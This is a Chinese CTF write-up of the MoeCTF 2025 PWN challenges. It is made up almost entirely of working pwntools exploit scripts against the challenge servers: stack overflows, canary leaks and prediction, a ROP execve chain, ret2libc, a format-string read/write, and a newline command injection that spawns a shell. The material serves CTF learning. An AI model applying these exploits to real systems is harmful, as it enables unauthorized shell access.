PWN

前面的几道题是基础的题目，就不再赘述了

boom/boom_revenge

from pwn import*
io=remote('61.139.2.1',56079)
#io=process('./boom')

recv_data=os.popen('./random').read()
list=recv_data.strip('\n')
list=recv_data.split('\n')

canary=list[0]
print(int(canary))

io.sendline(b'y')

payload=p32(int(canary))*38+p64(0x040101a)+p64(0x401276)
io.sendline(payload)

io.interactive()

fmt

简单的fmt，一读一写

%10$p---%7$s

再将第一个转换成相应的字符串，因为是小端序，再倒过来，输入两个字符串即可获取shell。

inject

因为没禁用\n，就指令连接一下即可

from pwn import*
io=remote('61.139.2.1',55479)

payload=b'\nsh -c sh'
io.sendline(b'4')
io.sendline(payload)

io.interactive()

randomlock

一样打随机数

from pwn import*
io=remote('61.139.2.1',63030)

recv_data=os.popen('./random').read()
list=recv_data.strip('\n')
list=recv_data.split('\n')

for i in range(10):
    payload=list[i]
    io.sendlineafter(b'>',str(payload))

io.interactive()

str_check

strcpy与memcpy的区别就是前者以\0结束不一定到n字节，后者一定到n字节。

from pwn import*
io=remote('61.139.2.1',54112)

payload=b'meow'+b'\x00'*(0x28-4)+p64(0x040101a)+p64(0x401236)

io.sendline(payload)
io.sendline(b'256')

io.interactive()

syslock

打系统调用

from pwn import*
context.arch='amd64'
io=remote('61.139.2.1',60959)

rax=0x0401244
rdi_rsi_rdx=0x0401240
bin_sh=0x0404084
syscall=0x0401230

io.sendafter(b'mode\n',b'-32')

payload=p32(0x3b)+b'/bin/sh\x00'
io.sendafter(b'password\n',payload)

payload=cyclic(0x40+8)+p64(rdi_rsi_rdx)+p64(bin_sh)+p64(0)+p64(0)+p64(rax)+p64(0x3b)+p64(syscall)
io.sendline(payload)

io.interactive()

xdulaker

开启了PIE保护，但给了opt地址，直接获取基址

from pwn import*
context.arch='amd64'
io=remote('61.139.2.1',53396)
#io=process('./xdulaker')

io.sendline(b'1')
io.recvuntil(b':0x')
opt=int(io.recv(12),16)
print(hex(opt))
base_addr=opt-0x04010
backdoor=base_addr+0x01249
ret=base_addr+0x0101a

io.sendline(b'2')
payload=cyclic(0x20)+b'xdulaker'
io.sendlineafter(b'name?!',payload)

io.sendline(b'3')
payload=cyclic(0x30+8)+p64(ret)+p64(backdoor)
io.sendlineafter(b'xdulaker',payload)

io.interactive()

ezlibc

简单的ret2libc

from pwn import *
elf = ELF('./ezlibc')
libc = ELF('./libc.so.6')
p = remote('61.139.2.1',62108)
p.recvuntil(b'How can I use ')
elf_leak = int(p.recv(14),16)
elf_base = elf_leak - 0x1060
print('elf base = ',hex(elf_base))
payload = b'a' * 0x20 + p64(0xdeadbeef) + p64(elf_base + 0x11EE)


p.send(payload)
p.recvuntil(b'How can I use ')
leak = int(p.recv(14),16)
print('leak:', hex(leak))
libc_base = leak - 0x1147d0
print('libc_base:', hex(libc_base))
system = libc_base + libc.symbols['system']
print('system:', hex(system))
binsh = libc_base + next(libc.search(b'/bin/sh'))
print('binsh:', hex(binsh))
ret = libc_base + 0x29139
rdi = libc_base + 0x2a3e5

payload = b'a' * 0x20 + p64(0xdeadbeef) + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
p.send(payload)
p.interactive()

ezprotection

from pwn import*

while True:
    io=remote('61.139.2.1',64627)
    io.send(b'a'*25)
    io.recvuntil(b'a'*25)

    canary=b'\x00'+io.recv(7)
    print(canary)


    payload=cyclic(0x20-8)+canary+p64(0xdeadbeef)+p16(0x127D)
    io.send(payload)
    out=io.recvall(1)
    if out.find(b'moectf')!= -1:
        print(out)
        break
    else:
        io.close()
        continue
io.interactive()

MoeCTF_2025

PWN

boom/boom_revenge

fmt

inject

randomlock

str_check

syslock

xdulaker

ezlibc

ezprotection

fmt_s